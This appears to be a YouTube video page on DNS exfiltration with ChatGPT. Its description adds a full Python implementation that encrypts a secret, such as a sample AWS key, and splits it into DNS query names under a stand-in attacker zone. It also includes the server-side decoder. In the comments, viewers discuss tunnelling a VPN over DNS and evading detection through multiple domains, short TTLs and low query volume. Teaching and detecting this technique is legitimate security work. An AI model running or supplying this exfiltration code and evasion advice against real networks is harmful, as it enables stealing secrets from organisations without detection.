DNS Exfiltration with ChatGPT

  • Published 5 Sep 2024
  • In this video we demonstrate what a DNS exfiltration attack is (smuggling data out of a network inside the query names of ordinary DNS lookups, which most firewalls let through) and how easy one is to pull off using ChatGPT. We also cover how to spot these DNS packets in Wireshark, and walk through three implementations of the attack of increasing complexity.
    Disclaimer: this video is for educational purposes only.
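The mechanics the video demonstrates, as an added example that is not the video's script: the secret is split into chunks that fit the DNS limits (63 octets per label, 253 for the whole name), base32-encoded into subdomain labels with a sequence number, and looked up under an attacker-controlled zone; the rogue authoritative server parses the names back together. The zone name, the session id and the toy SHA-256 keystream cipher are assumptions for the demo. The cipher is there only to illustrate the point raised in the comments below that a symmetric cipher, unlike an MD5 hash, can be reversed with the key; a real implant would use a vetted AEAD such as AES-GCM.

```python
"""Chunk a secret into DNS query names and reassemble it (added example)."""
import base64
import hashlib
import re

# Constructed values for the demo: an attacker-controlled zone and a key
# shared between the implant and the rogue authoritative server.
EXFIL_DOMAIN = "exfil.example.net"
SHARED_KEY = b"demo-pre-shared-key"
MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a name in text form is at most 253 octets


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy symmetric stream cipher: XOR with SHA-256(key || block counter).

    The only point is that the transform is reversible with the key, which an
    MD5 digest is not. Demo construction, not something to ship: use AES-GCM
    from a real library.
    """
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + (i // 32).to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)


def bytes_per_query(session: str, domain: str = EXFIL_DOMAIN) -> int:
    """Payload bytes that fit in one query once the fixed suffix
    (<seq>.<session>.<domain>) and the 63/253 limits are accounted for."""
    suffix = f"0000.{session}.{domain}"
    room = MAX_NAME - len(suffix)          # characters left for data labels
    labels = room // (MAX_LABEL + 1)       # each label costs 63 chars plus a dot
    return (labels * MAX_LABEL // 8) * 5   # base32: 5 raw bytes -> 8 characters


def encode_queries(secret: bytes, session: str, key: bytes = SHARED_KEY,
                   domain: str = EXFIL_DOMAIN) -> list[str]:
    """Encrypt `secret` and split it into query names of the form
    <b32>.<b32>...<seq>.<session>.<domain>, one name per chunk."""
    data = keystream_xor(key, secret)
    step = bytes_per_query(session, domain)
    names = []
    for seq, off in enumerate(range(0, len(data), step)):
        b32 = base64.b32encode(data[off:off + step]).decode().rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        names.append(".".join(labels + [f"{seq:04d}", session, domain]))
    return names


_NAME_RE = re.compile(
    r"^(?P<data>(?:[a-z2-7]{1,63}\.)+)(?P<seq>\d{4})\."
    r"(?P<session>[a-z0-9-]{1,63})\.(?P<domain>.+)$")


def decode_queries(names: list[str], key: bytes = SHARED_KEY,
                   domain: str = EXFIL_DOMAIN) -> bytes:
    """What the rogue authoritative server does with the names it receives:
    parse, order by sequence number, base32-decode, decrypt. Names that do
    not belong to the zone (or arrive out of order) are handled."""
    chunks = {}
    for name in names:
        m = _NAME_RE.match(name.lower())
        if not m or m["domain"] != domain:
            continue                           # not ours, ignore
        b32 = m["data"].replace(".", "").upper()
        b32 += "=" * (-len(b32) % 8)           # restore the padding we stripped
        chunks[int(m["seq"])] = base64.b32decode(b32)
    data = b"".join(chunks[s] for s in sorted(chunks))
    return keystream_xor(key, data)


if __name__ == "__main__":
    secret = b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n" * 5
    queries = encode_queries(secret, "s1a2")
    print(len(queries), "queries, longest name", max(map(len, queries)), "chars")
    print(queries[0])
    assert decode_queries(queries) == secret
```

On the wire each of these names is just an A lookup that the corporate resolver forwards to the attacker's authoritative server, which is why the traffic passes most egress filtering. With the constructed 17-character zone and a 4-character session id, one query carries 115 bytes of payload, so a 300-byte secret leaves in three lookups.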

Comments • 13

  • @vk3fbab
    @vk3fbab 5 months ago +3

    Came here from comments of a later video about using ping for the same thing. Yep, this is a great start. With enough motivation I think you could actually build a VPN over DNS. This should pass most firewalls and DNS forwarders. You'd need to write a custom DNS server, but Python's Twisted framework has an example of this. You'd push data up in the query and be able to return heaps more data with many IPv6 IPs in the response. In order to evade detection you might need a bunch of domain names with DNS servers on different networks. Your responses should have short TTLs just in case you get the same query twice. The only challenge I can see is that you would need to send multiple-query DNS requests and these become fairly easy to spot. Most queries only ask for one record, so a network device might be able to signal there are lots of multiple-query DNS requests. However, the horse would have well and truly bolted before anyone got wise to the fact you were exfiltrating data via DNS. Even longer before they realised you were running a VPN.

    • @plaintextpackets
      @plaintextpackets 5 months ago +1

      I think this is absolutely possible

    • @vk3fbab
      @vk3fbab 5 months ago +1

      @plaintextpackets Yes, I did some more research and there are tools around that can do all sorts of stuff using properly formed DNS queries. So completely possible, and it looks like the only way to stop it is by looking at the volume and rate of querying of DNS.

    • @nittani.
      @nittani. 4 months ago

      Woahhhhhhhhhhh imma build this for kalicraft

  • @mtnsolutions
    @mtnsolutions 4 months ago +4

    That’s it…no one is allowed to use DNS any more. Block all traffic on 53. Job done. Haha

  • @TonoNamnum
    @TonoNamnum 1 year ago +1

    You cannot decrypt an MD5 hash; it is a one-way function. You want to encrypt it instead. But I get the idea. Very interesting video!

    • @plaintextpackets
      @plaintextpackets 1 year ago +2

      You're right! I just realized, should have asked it for a simple symmetric encryption.

  • @foxxrider250r
    @foxxrider250r 6 months ago

    Awesome video! I believe this technique is very prevalent out in the wild, but I suppose this only works once you are inside the network. Could this be prevented by monitoring the number of DNS queries? Surely high-end firewalls can detect an abnormal amount of that traffic, but like you said, I guess you could just set it up to send little bits at a time?

    • @plaintextpackets
      @plaintextpackets 6 months ago +1

      Yep it would work inside a network. A lot of corporations are challenged with keeping confidential information off of the public internet while still allowing access to users.
      You are right you’d have to control the volume as volumetric increases in traffic can be easily spotted.

  • @codygaudet8071
    @codygaudet8071 6 months ago

    Imagine a messaging protocol that makes explicit use of DNS only to transmit messages in plain text in a secure way.

    • @plaintextpackets
      @plaintextpackets 6 months ago

      With a little development this is totally doable and likely already out in the wild today

    • @foxxrider250r
      @foxxrider250r 6 months ago

      Can you explain what you mean?